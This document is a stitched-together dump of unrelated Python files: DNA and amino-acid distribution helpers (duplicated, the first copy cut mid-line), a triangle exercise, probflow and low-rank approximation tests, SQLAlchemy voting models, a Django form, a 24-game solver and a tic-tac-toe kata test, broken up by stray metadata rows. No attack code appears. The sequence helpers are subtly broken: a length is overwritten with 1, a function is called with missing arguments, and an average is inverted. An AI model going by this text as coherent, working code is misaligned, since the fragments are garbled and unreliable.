\t Artificial Reference \t Delta \n") sum1 =0 sum2= 0 for item in Ndic_G.keys(): fobj.write(item +"\t"+str(Ndic_G[item])+"\t"+str(Ndic_AR[item])+"\t"+str(Ndic_G[item]-Ndic_AR[item])+"\n") sum1 +=abs(Ndic_G[item]-Ndic_AR[item]) fobj.write(str(sum1)+"\n") for item in aadic_G.keys(): fobj.write(item +"\t"+str(aadic_G[item])+"\t"+str(aadic_AR[item])+"\t"+str(aadic_G[item]-aadic_AR[item])+"\n") sum2 +=abs(aadic_G[item]-aadic_AR[item]) fobj.write(str(sum2)+"\n") def nucleotide_dist_seq(seq,txt_file,shallwrite): """ Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. """ Nndic={"A":0,"C":0,"G":0,"T":0,"N":0} for i in range(0,len(seq)): Nndic[seq[i]]+=1 s=len(seq) s=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) output_file.write(item + "\t" + str(Nndic[item])+"\n") output_file.close() else: for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) return (Nndic) #N can be used for checking: should be the same number in real # and artificial chromosome def aa_dist_seq(seq,txt_file,shallwrite): """ Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. """ aadic = {"A":0,"R":0,"N":0,"D":0,"C":0,"E":0,"Q":0,"G":0,"H":0,"I":0,"L":0,"K":0,"M":0,"F":0,"P":0,"S":0,"T":0,"W":0,"Y":0,"V":0,"*":0} for i in range(0,len(seq)): '''escape 'n' Sequences ''' if (seq[i] in aadic): aadic[seq[i]]+=1 else: continue n = len(seq) n=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in aadic.keys(): aadic[item]=aadic[item]/float(n) output_file.write(item + "\t" + str(aadic[item])+"\n") output_file.close() else: for item in aadic.keys(): aadic[item]=aadic[item]/float(n) return (aadic) ''' input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile ''' def nucleotide_dist_file(file_fasta,txt_file): """ Writes the DNA distribution in a file and returns the dictionary. adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. """ input_file=open(file_fasta,'r') output_file=open(txt_file,'a') seq='' for line in input_file: if line[0]!='>': line=line.rstrip() seq+=line output_file.write(str(nucleotide_dist_seq(seq))) output_file.write('\n') output_file.close() input_file.close() '''gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence ''' def gethammingdistance(original,artificial): """ Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. """ hamming = 0 not_hamming=0 for i in range(0,len(original)): if (original[i]!=artificial[i]): hamming +=1 else: not_hamming+=1 print ("#hamming distance REF-ART\t"+ str(hamming)) print ("avg. distance:\t" + str(len(original)/float(hamming))) print("###########################\r\n")
#!/usr/bin/env python ''' Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> ''' import os import random import HTSeq def readdna(filename): """ Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. """ chr = HTSeq.FastaReader(filename) for fasta in chr: referenz = HTSeq.Sequence(fasta.seq,fasta.name) return(referenz) def writefile(sequenceObject,filename): """ Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. """ outfasta = open(filename,"w") sequenceObject.write_to_fasta_file(outfasta) outfasta.close() def writeoverview(Ndic_G,aadic_G,Ndic_AR,aadic_AR,filename): """ Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. """ fobj = open(filename,"w") fobj.write("NUC /AA \t Genom \t Artificial Reference \t Delta \n") sum1 =0 sum2= 0 for item in Ndic_G.keys(): fobj.write(item +"\t"+str(Ndic_G[item])+"\t"+str(Ndic_AR[item])+"\t"+str(Ndic_G[item]-Ndic_AR[item])+"\n") sum1 +=abs(Ndic_G[item]-Ndic_AR[item]) fobj.write(str(sum1)+"\n") for item in aadic_G.keys(): fobj.write(item +"\t"+str(aadic_G[item])+"\t"+str(aadic_AR[item])+"\t"+str(aadic_G[item]-aadic_AR[item])+"\n") sum2 +=abs(aadic_G[item]-aadic_AR[item]) fobj.write(str(sum2)+"\n") def nucleotide_dist_seq(seq,txt_file,shallwrite): """ Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. """ Nndic={"A":0,"C":0,"G":0,"T":0,"N":0} for i in range(0,len(seq)): Nndic[seq[i]]+=1 s=len(seq) s=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) output_file.write(item + "\t" + str(Nndic[item])+"\n") output_file.close() else: for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) return (Nndic) #N can be used for checking: should be the same number in real # and artificial chromosome def aa_dist_seq(seq,txt_file,shallwrite): """ Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. """ aadic = {"A":0,"R":0,"N":0,"D":0,"C":0,"E":0,"Q":0,"G":0,"H":0,"I":0,"L":0,"K":0,"M":0,"F":0,"P":0,"S":0,"T":0,"W":0,"Y":0,"V":0,"*":0} for i in range(0,len(seq)): '''escape 'n' Sequences ''' if (seq[i] in aadic): aadic[seq[i]]+=1 else: continue n = len(seq) n=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in aadic.keys(): aadic[item]=aadic[item]/float(n) output_file.write(item + "\t" + str(aadic[item])+"\n") output_file.close() else: for item in aadic.keys(): aadic[item]=aadic[item]/float(n) return (aadic) ''' input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile ''' def nucleotide_dist_file(file_fasta,txt_file): """ Writes the DNA distribution in a file and returns the dictionary. adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. """ input_file=open(file_fasta,'r') output_file=open(txt_file,'a') seq='' for line in input_file: if line[0]!='>': line=line.rstrip() seq+=line output_file.write(str(nucleotide_dist_seq(seq))) output_file.write('\n') output_file.close() input_file.close() '''gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence ''' def gethammingdistance(original,artificial): """ Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. """ hamming = 0 not_hamming=0 for i in range(0,len(original)): if (original[i]!=artificial[i]): hamming +=1 else: not_hamming+=1 print ("#hamming distance REF-ART\t"+ str(hamming)) print ("avg. distance:\t" + str(len(original)/float(hamming))) print("###########################\r\n")
en
0.649137
#!/usr/bin/env python Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. #N can be used for checking: should be the same number in real # and artificial chromosome Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. escape 'n' Sequences input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile Writes the DNA distribution in a file and returns the dictionary. adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. ##########################\r\n")
3.245538
3
Aula 10/ex35.py
rafa-santana/Curso-Python
1
6618581
print('Digite o comprimento de 03 reta e descubra se podem formar um triângulo') a = float(input('Digite a primeira reta: ')) b = float(input('Digite a segunda reta: ')) c = float(input('Digite a terceira reta: ')) if a+b>c and a+c>b and b+c>a: print('As retas formam um triângulo!') else: print('As retas não formam um triângulo.')
print('Digite o comprimento de 03 reta e descubra se podem formar um triângulo') a = float(input('Digite a primeira reta: ')) b = float(input('Digite a segunda reta: ')) c = float(input('Digite a terceira reta: ')) if a+b>c and a+c>b and b+c>a: print('As retas formam um triângulo!') else: print('As retas não formam um triângulo.')
none
1
4.055905
4
tests/unit/tensorflow/parameters/test_multivariate_normal_parameter.py
chiragnagpal/probflow
134
6618582
import numpy as np import tensorflow as tf import tensorflow_probability as tfp from probflow.parameters import MultivariateNormalParameter tfd = tfp.distributions def is_close(a, b, tol=1e-3): return np.abs(a - b) < tol def test_MultivariateNormalParameter(): """Tests probflow.parameters.MultivariateNormalParameter""" # Create the parameter param = MultivariateNormalParameter(4) # kl_loss should still be scalar kl_loss = param.kl_loss() assert isinstance(kl_loss, tf.Tensor) assert kl_loss.ndim == 0 # posterior_mean should return mean sample1 = param.posterior_mean() sample2 = param.posterior_mean() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert sample1.shape[1] == 1 assert sample2.shape[1] == 1 assert np.all(sample1 == sample2) # posterior_sample should return samples sample1 = param.posterior_sample() sample2 = param.posterior_sample() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert np.all(sample1 != sample2) # posterior_sample should be able to return multiple samples sample1 = param.posterior_sample(10) sample2 = param.posterior_sample(10) assert sample1.ndim == 3 assert sample2.ndim == 3 assert sample1.shape[0] == 10 assert sample1.shape[1] == 4 assert sample2.shape[0] == 10 assert sample2.shape[1] == 4 assert np.all(sample1 != sample2) # prior_sample should be d-dimensional prior_sample = param.prior_sample() assert prior_sample.ndim == 2 assert prior_sample.shape[0] == 4 prior_sample = param.prior_sample(n=7) assert prior_sample.ndim == 3 assert prior_sample.shape[0] == 7 assert prior_sample.shape[1] == 4 # test slicing s = param[:-2] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 2 assert s.shape[1] == 1 s = param[1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1 s = param[-1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1
import numpy as np import tensorflow as tf import tensorflow_probability as tfp from probflow.parameters import MultivariateNormalParameter tfd = tfp.distributions def is_close(a, b, tol=1e-3): return np.abs(a - b) < tol def test_MultivariateNormalParameter(): """Tests probflow.parameters.MultivariateNormalParameter""" # Create the parameter param = MultivariateNormalParameter(4) # kl_loss should still be scalar kl_loss = param.kl_loss() assert isinstance(kl_loss, tf.Tensor) assert kl_loss.ndim == 0 # posterior_mean should return mean sample1 = param.posterior_mean() sample2 = param.posterior_mean() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert sample1.shape[1] == 1 assert sample2.shape[1] == 1 assert np.all(sample1 == sample2) # posterior_sample should return samples sample1 = param.posterior_sample() sample2 = param.posterior_sample() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert np.all(sample1 != sample2) # posterior_sample should be able to return multiple samples sample1 = param.posterior_sample(10) sample2 = param.posterior_sample(10) assert sample1.ndim == 3 assert sample2.ndim == 3 assert sample1.shape[0] == 10 assert sample1.shape[1] == 4 assert sample2.shape[0] == 10 assert sample2.shape[1] == 4 assert np.all(sample1 != sample2) # prior_sample should be d-dimensional prior_sample = param.prior_sample() assert prior_sample.ndim == 2 assert prior_sample.shape[0] == 4 prior_sample = param.prior_sample(n=7) assert prior_sample.ndim == 3 assert prior_sample.shape[0] == 7 assert prior_sample.shape[1] == 4 # test slicing s = param[:-2] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 2 assert s.shape[1] == 1 s = param[1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1 s = param[-1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1
en
0.408167
Tests probflow.parameters.MultivariateNormalParameter # Create the parameter # kl_loss should still be scalar # posterior_mean should return mean # posterior_sample should return samples # posterior_sample should be able to return multiple samples # prior_sample should be d-dimensional # test slicing
2.481728
2
app/models/voting.py
covega/enviro_papers
0
6618583
from sqlalchemy import (Column, Integer, Enum, Float, ForeignKey, Sequence, String, Text) from app.models import Base import enum class VotingClassification(enum.Enum): PRO_ENVIRONMENT = "+" # Vote for the environment ANTI_ENVIRONMENT = "-" # Vote against the environment EXCUSED = "E" # Excused from Vote ABSENT = "A" # Unexcused Absence from Vote PRESENT = "P" # Present, Not Voting UNKNOWN = "N/A" class VotingAction(enum.Enum): YES = "YES" NO = "NO" @classmethod def fuzzy_cast(cls, s): out = None try: out = cls(s) except ValueError: if s.startswith(cls.YES.value): out = cls.YES elif s.startswith(cls.NO.value): out = cls.NO return out class Party(enum.Enum): DEMOCRAT = "D" REPUBLICAN = "R" INDEPENDANT = "I" class VotingRecord(Base): __tablename__ = 'voting_record' id = Column(Integer, Sequence('voting_record_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) vote_fulltext = Column(Text, nullable=False) def __repr__(self): return "<VotingRecord(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class Bill(Base): __tablename__ = 'bill' id = Column(Integer, Sequence('bill_id_seq'), primary_key=True) state = Column(String(2), ForeignKey('state.abbr'), nullable=False) pro_environment_decision = Column(Enum(VotingAction)) title = Column(String(200), nullable=False) code = Column(String(50)) description = Column(Text) outcome = Column(String(50)) def __repr__(self): return "<Bill(state='%s', code='%s', title='%s')>" % ( self.state, self.code, self.title) class Vote(Base): __tablename__ = 'vote' id = Column(Integer, Sequence('vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) year = Column(Integer, nullable=False) party = Column(Enum(Party)) year_score = Column(Float) lifetime_score = Column(Float) def __repr__(self): return "<Vote(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class DistrictIncumbentVote(Base): __tablename__ = 'district_incumbent_vote' id = Column(Integer, Sequence('district_incumbent_vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) bill_pro_environment_decision = Column(Enum(VotingAction)) bill_title = Column(String(200), nullable=False) bill_code = Column(String(50)) bill_description = Column(Text) year = Column(Integer, nullable=False) def __repr__(self): return "<DistrictIncumbentVote(district_shortcode='%s', legislator_name='%s', bill_id='%d')>" % ( self.district_shortcode, self.legislator_name, self.bill_id)
from sqlalchemy import (Column, Integer, Enum, Float, ForeignKey, Sequence, String, Text) from app.models import Base import enum class VotingClassification(enum.Enum): PRO_ENVIRONMENT = "+" # Vote for the environment ANTI_ENVIRONMENT = "-" # Vote against the environment EXCUSED = "E" # Excused from Vote ABSENT = "A" # Unexcused Absence from Vote PRESENT = "P" # Present, Not Voting UNKNOWN = "N/A" class VotingAction(enum.Enum): YES = "YES" NO = "NO" @classmethod def fuzzy_cast(cls, s): out = None try: out = cls(s) except ValueError: if s.startswith(cls.YES.value): out = cls.YES elif s.startswith(cls.NO.value): out = cls.NO return out class Party(enum.Enum): DEMOCRAT = "D" REPUBLICAN = "R" INDEPENDANT = "I" class VotingRecord(Base): __tablename__ = 'voting_record' id = Column(Integer, Sequence('voting_record_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) vote_fulltext = Column(Text, nullable=False) def __repr__(self): return "<VotingRecord(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class Bill(Base): __tablename__ = 'bill' id = Column(Integer, Sequence('bill_id_seq'), primary_key=True) state = Column(String(2), ForeignKey('state.abbr'), nullable=False) pro_environment_decision = Column(Enum(VotingAction)) title = Column(String(200), nullable=False) code = Column(String(50)) description = Column(Text) outcome = Column(String(50)) def __repr__(self): return "<Bill(state='%s', code='%s', title='%s')>" % ( self.state, self.code, self.title) class Vote(Base): __tablename__ = 'vote' id = Column(Integer, Sequence('vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) year = Column(Integer, nullable=False) party = Column(Enum(Party)) year_score = Column(Float) lifetime_score = Column(Float) def __repr__(self): return "<Vote(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class DistrictIncumbentVote(Base): __tablename__ = 'district_incumbent_vote' id = Column(Integer, Sequence('district_incumbent_vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) bill_pro_environment_decision = Column(Enum(VotingAction)) bill_title = Column(String(200), nullable=False) bill_code = Column(String(50)) bill_description = Column(Text) year = Column(Integer, nullable=False) def __repr__(self): return "<DistrictIncumbentVote(district_shortcode='%s', legislator_name='%s', bill_id='%d')>" % ( self.district_shortcode, self.legislator_name, self.bill_id)
en
0.936143
# Vote for the environment # Vote against the environment # Excused from Vote # Unexcused Absence from Vote # Present, Not Voting
2.568624
3
makahiki/apps/widgets/prizes/forms.py
justinslee/Wai-Not-Makahiki
1
6618584
''' Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> ''' from django import forms from apps.managers.challenge_mgr.models import RoundSetting class ChangePrizeRoundForm(forms.Form): """change prize round form.""" round_choice = forms.ModelChoiceField(queryset=RoundSetting.objects.all(), required=True)
''' Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> ''' from django import forms from apps.managers.challenge_mgr.models import RoundSetting class ChangePrizeRoundForm(forms.Form): """change prize round form.""" round_choice = forms.ModelChoiceField(queryset=RoundSetting.objects.all(), required=True)
en
0.91477
Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> change prize round form.
2.886361
3
tests/database/test_get_query.py
constructpm/pysyncgateway
2
6618585
<reponame>constructpm/pysyncgateway<filename>tests/database/test_get_query.py from pysyncgateway import Query def test(database): result = database.get_query('test') assert result == Query(database, 'test')
from pysyncgateway import Query def test(database): result = database.get_query('test') assert result == Query(database, 'test')
none
1
2.1037
2
code/ch04/4.2.1.24game.py
leetcode-pp/leetcode-pp1
22
6618586
<reponame>leetcode-pp/leetcode-pp1<gh_stars>10-100 from typing import List class Solution: def judgePoint24(self, nums: List[int]) -> bool: permutations = self.permuteUnique(nums) for permutation in permutations: if self.compute(permutation): return True return False def compute(self, nums: List[float]) -> bool: if len(nums) == 1: return abs(nums[0] - 24) <= 0.00001 for i in range(len(nums) - 1): # compute possible result from + - * / tmp = [] tmp.append(nums[i] + nums[i + 1]) tmp.append(nums[i] - nums[i + 1]) tmp.append(nums[i] * nums[i + 1]) if nums[i + 1] != 0: tmp.append(nums[i] / nums[i + 1]) for num in tmp: new_list = nums[:] new_list[i] = num new_list.pop(i + 1) if self.compute(new_list): return True return False def permuteUnique(self, nums: List[int]) -> List[List[int]]: permutations = [] nums.sort() tmp = [] visited = [False] * len(nums) self.backtracking(nums, tmp, visited, permutations) return permutations def backtracking( self, nums: List[int], tmp: List[float], visited: List[bool], perm: List[int], ) -> None: if len(nums) == len(tmp): perm.append(tmp[:]) return for i in range(len(nums)): if visited[i]: continue if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]: continue visited[i] = True tmp.append(nums[i]) self.backtracking(nums, tmp, visited, perm) visited[i] = False tmp.pop()
from typing import List class Solution: def judgePoint24(self, nums: List[int]) -> bool: permutations = self.permuteUnique(nums) for permutation in permutations: if self.compute(permutation): return True return False def compute(self, nums: List[float]) -> bool: if len(nums) == 1: return abs(nums[0] - 24) <= 0.00001 for i in range(len(nums) - 1): # compute possible result from + - * / tmp = [] tmp.append(nums[i] + nums[i + 1]) tmp.append(nums[i] - nums[i + 1]) tmp.append(nums[i] * nums[i + 1]) if nums[i + 1] != 0: tmp.append(nums[i] / nums[i + 1]) for num in tmp: new_list = nums[:] new_list[i] = num new_list.pop(i + 1) if self.compute(new_list): return True return False def permuteUnique(self, nums: List[int]) -> List[List[int]]: permutations = [] nums.sort() tmp = [] visited = [False] * len(nums) self.backtracking(nums, tmp, visited, permutations) return permutations def backtracking( self, nums: List[int], tmp: List[float], visited: List[bool], perm: List[int], ) -> None: if len(nums) == len(tmp): perm.append(tmp[:]) return for i in range(len(nums)): if visited[i]: continue if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]: continue visited[i] = True tmp.append(nums[i]) self.backtracking(nums, tmp, visited, perm) visited[i] = False tmp.pop()
en
0.619534
# compute possible result from + - * /
3.136164
3
kyu_5/tic_tac_toe_checker/test_checker.py
ikostan/codewars
1
6618587
""" Testing is_solved function """ # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS import allure import unittest from utils.log_func import print_log from kyu_5.tic_tac_toe_checker.checker import is_solved @allure.epic('5 kyu') @allure.parent_suite('Novice') @allure.suite('Algorithms') @allure.sub_suite("Unit Tests") @allure.feature('Lists') @allure.story('Tic-Tac-Toe Checker') @allure.tag('ALGORITHMS', 'ARRAY') @allure.link(url='https://www.codewars.com/kata/525caa5c1bf619d28c000335/train/python', name='Source/Kata') class IsSolvedTestCase(unittest.TestCase): """ Testing is_solved function """ def test_is_solved(self): """ Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw). """ allure.dynamic.title("Testing done_or_not function") allure.dynamic.severity(allure.severity_level.NORMAL) allure.dynamic.description_html('<h3>Codewars badge:</h3>' '<img src="https://www.codewars.com/users/myFirstCode' '/badges/large">' '<h3>Test Description:</h3>' "<p>The function should return whether the board's " "current state is solved.</p>") test_data = ( ([[0, 0, 1], [0, 1, 2], [2, 1, 0]], -1, 'not yet finished'), ([[1, 1, 1], [0, 2, 2], [0, 0, 0]], 1, 'winning row'), ([[2, 1, 2], [2, 1, 1], [1, 1, 2]], 1, 'winning column'), ([[2, 1, 2], [2, 1, 1], [1, 2, 1]], 0, 'draw'), ([[1, 2, 0], [0, 1, 2], [0, 0, 1]], 1, 'wining diagonal' ) ) for board, expected, message in test_data: result = is_solved(board) with allure.step("Enter Tic-Tac-Toe board and verify the output."): print_log(expected=expected, result=result, message=message) self.assertEqual(expected, result, msg=message)
""" Testing is_solved function """ # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS import allure import unittest from utils.log_func import print_log from kyu_5.tic_tac_toe_checker.checker import is_solved @allure.epic('5 kyu') @allure.parent_suite('Novice') @allure.suite('Algorithms') @allure.sub_suite("Unit Tests") @allure.feature('Lists') @allure.story('Tic-Tac-Toe Checker') @allure.tag('ALGORITHMS', 'ARRAY') @allure.link(url='https://www.codewars.com/kata/525caa5c1bf619d28c000335/train/python', name='Source/Kata') class IsSolvedTestCase(unittest.TestCase): """ Testing is_solved function """ def test_is_solved(self): """ Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw). """ allure.dynamic.title("Testing done_or_not function") allure.dynamic.severity(allure.severity_level.NORMAL) allure.dynamic.description_html('<h3>Codewars badge:</h3>' '<img src="https://www.codewars.com/users/myFirstCode' '/badges/large">' '<h3>Test Description:</h3>' "<p>The function should return whether the board's " "current state is solved.</p>") test_data = ( ([[0, 0, 1], [0, 1, 2], [2, 1, 0]], -1, 'not yet finished'), ([[1, 1, 1], [0, 2, 2], [0, 0, 0]], 1, 'winning row'), ([[2, 1, 2], [2, 1, 1], [1, 1, 2]], 1, 'winning column'), ([[2, 1, 2], [2, 1, 1], [1, 2, 1]], 0, 'draw'), ([[1, 2, 0], [0, 1, 2], [0, 0, 1]], 1, 'wining diagonal' ) ) for board, expected, message in test_data: result = is_solved(board) with allure.step("Enter Tic-Tac-Toe board and verify the output."): print_log(expected=expected, result=result, message=message) self.assertEqual(expected, result, msg=message)
en
0.768003
Testing is_solved function # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS Testing is_solved function Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw).
3.039385
3
wlra/tests/test_wlra.py
aksarkar/wlra
7
6618588
<reponame>aksarkar/wlra import numpy as np import os import pickle import pytest import scipy.stats as st import wlra from fixtures import * # This is needed to get functions not publicly exported from wlra.wlra import lra from wlra.nmf import nmf def test_lra_shape(): x = np.zeros((100, 200)) res = lra(x, rank=1) assert res.shape == (100, 200) def test_lra_value(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = lra(x, rank=1) u, d, vt = np.linalg.svd(x, full_matrices=False) res0 = u[:,:1].dot(vt[:1]) * d[0] # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close assert np.isclose(np.linalg.norm(x - res), np.linalg.norm(x - res0), atol=0.1) def test_wlra_shape(): x = np.zeros((100, 200)) w = np.ones((100, 200)) res = wlra.wlra(x, w, rank=1) assert res.shape == (100, 200) def test_wlra_unit_weight(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=1) res0 = lra(x, rank=1) assert np.isclose(res, res0).all() def test_wlra_rank_2(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=2) res0 = lra(x, rank=2) assert np.isclose(res, res0).all() def test_wlra_missing(simulate): x, eta = simulate w = (np.random.uniform(size=x.shape) < 0.1).astype(float) wlra.wlra(x, w, rank=3) def test_plra_shape(): x = np.ones((100, 200)) res = wlra.plra(x, 1) assert res.shape == (100, 200) def test_plra_assume_rank_1(): x = np.random.poisson(lam=np.exp(np.random.normal(size=(100, 200)))) res = wlra.plra(x, 1) def test_plra_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=100, check_converged=True))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra1_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=1))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra_mask(simulate): x, eta = simulate mask = np.random.uniform(size=x.shape) < 0.25 x = np.ma.masked_array(x, mask=mask) res = wlra.plra(x, 3) @pytest.mark.skip('dummy test') def test_plra1_10x(): import scmodes x = scmodes.dataset.read_10x(f'/project2/mstephens/aksarkar/projects/singlecell-ideas/data/10xgenomics/b_cells/filtered_matrices_mex/hg19/', return_df=True) res = wlra.plra(x.values, rank=10, verbose=True)
